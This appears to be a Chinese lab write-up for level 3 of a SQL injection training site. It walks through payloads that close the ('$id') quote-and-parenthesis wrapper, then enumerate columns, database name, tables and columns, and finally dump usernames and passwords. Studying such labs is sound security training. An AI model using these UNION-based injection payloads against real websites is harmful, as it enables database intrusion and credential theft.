第三关如下：

查看该关卡的代码发现其与关卡一和关卡二的不同之处在于id=('$id')这里。

那么我们输入?id=1或?id=2')--+都能用来判断是字符型还是数字型注入。

接着输入?id=1') order by 3--+检查它的列数。检查到4报错，说明只有三列。

输入?id=-1') union select1,2,3--+查看其显示的是哪几行，结果为2，3行显示。

输入?id=-1') union select 1,database(),version()--+查看它的数据库名和版本号。

 

这里的?id=-1后的')不能不添加，例如输入?id=-1 union select 1,database(),version()--+，在代码运行的时候，红框代码直接跳过运行蓝框的代码，导致没有输出结果，若是输入id=-1') union select 1,database(),version()--+，则运行红框的代码，查询结果并输出至前端。

输入?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+，查询上面查询到的数据库security中的内容。

输入?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+，查询users表中的内容，查看到有username和password我们目标的表。

最后输入?id=-1') union select 1,username,password from users where id=1 --+，查看到第一个的账号密码。

?id=-1') union select 1,username,password from users where id=2 --+查看到第二个的账号密码。

以上就是第三关的内容了。步骤与第一第二关一致，区别就在于第一关中id=1，第二关?id=1'，第三关则是?id=1')，按照源码中的内容来进行区分。